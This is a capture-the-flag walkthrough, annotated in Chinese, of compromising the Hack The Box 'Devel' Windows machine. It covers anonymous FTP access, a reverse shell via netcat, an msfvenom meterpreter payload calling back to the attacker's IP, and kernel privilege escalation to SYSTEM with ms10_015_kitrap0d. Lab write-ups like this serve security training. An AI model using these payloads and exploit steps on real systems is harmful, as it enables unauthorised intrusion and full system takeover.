Devel(开发)
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Devel]
└─# nmap 10.129.20.13 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-28 10:20 EST
Nmap scan report for 10.129.20.13
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 54.62 seconds
1.2. ftp
┌──(root㉿kali)-[~/Desktop/htb/Devel]
└─# ftp 10.129.20.13
Connected to 10.129.20.13.
220 Microsoft FTP Service
Name (10.129.20.13:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> bin
200 Type set to I.
ftp> get welcome.png
local: welcome.png remote: welcome.png
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************************| 180 KiB 33.96 KiB/s 00:00 ETA
226 Transfer complete.
184946 bytes received in 00:05 (33.96 KiB/s)
ftp> cd aspnet_client
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49162|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> 2_0_50727
226 Transfer complete.
ftp> tree
?Invalid command.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49164|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
默认网站页面,可尝试上后门
然后反弹shell
┌──(root㉿kali)-[~/Desktop/htb/Devel]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.56] from (UNKNOWN) [10.129.20.13] 49171
PS C:\windows\system32\inetsrv> whoami
iis apppool\web
PS C:\windows\system32\inetsrv> ls
Directory: C:\windows\system32\inetsrv
2. System
PS C:\users> tree . /a /f
Folder PATH listing
Volume serial number is 00000002 137F:3971
C:\USERS
+---Administrator
+---babis
+---Classic .NET AppPool
\---Public
+---Documents
+---Downloads
+---Music
| \---Sample Music
| Kalimba.mp3
| Maid with the Flaxen Hair.mp3
| Sleep Away.mp3
|
+---Pictures
| \---Sample Pictures
| Chrysanthemum.jpg
| Desert.jpg
| Hydrangeas.jpg
| Jellyfish.jpg
| Koala.jpg
| Lighthouse.jpg
| Penguins.jpg
| Tulips.jpg
|
+---Recorded TV
| \---Sample Media
| win7_scenic-demoshort_raw.wtv
|
\---Videos
\---Sample Videos
Wildlife.wmv
2.1. 内核提权
PS C:\users\public> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
>>>> SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
可以发现存在 SeImpersonatePrivilege 权限,直接用 GodPotato 提权
先看.net版本
PS C:\users\public> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5
用3.5的提权即可
PS C:\inetpub\wwwroot> ./GodPotato-NET35.exe -cmd "cmd /c whoami"
[!] No combase module found
PS C:\inetpub\wwwroot> ./GodPotato-NET35.exe -cmd whoami
[!] No combase module found
PS C:\inetpub\wwwroot> .\GodPotato-NET35.exe -cmd whoami
[!] No combase module found
PS C:\inetpub\wwwroot> ./GodPotato-NET35.exe -cmd whoami
[!] No combase module found
"No combase module found" 表示系统缺少 COM 基础模块(combase.dll),常见于精简系统或 COM 服务未启用
PS C:\inetpub\wwwroot> Get-Service COMSysApp
Status Name DisplayName
------ ---- -----------
Stopped COMSysApp COM+ System Application
发现COM服务确实没有启用
2.2. MS11-046
这里可以使用 MS11-046 进行内核提权
wget https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/MS11-046.exe
最后还是用 msf 提权成功的。
┌──(root㉿kali)-[~/Desktop/htb/Devel]
└─# msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.14.56 LPORT=4445 -f exe -o msf.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 177734 bytes
Final size of exe file: 184832 bytes
Saved as: msf.exe
use post/multi/recon/local_exploit_suggester
msf exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.56:5555
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 2244 launched.
[*] Reflectively injecting the DLL into 2244...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.129.20.13
[*] Meterpreter session 10 opened (10.10.14.56:5555 -> 10.129.20.13:49204) at 2025-11-28 11:36:01 -0500
meterpreter > shell
Process 3416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot>whoami
whoami
nt authority\system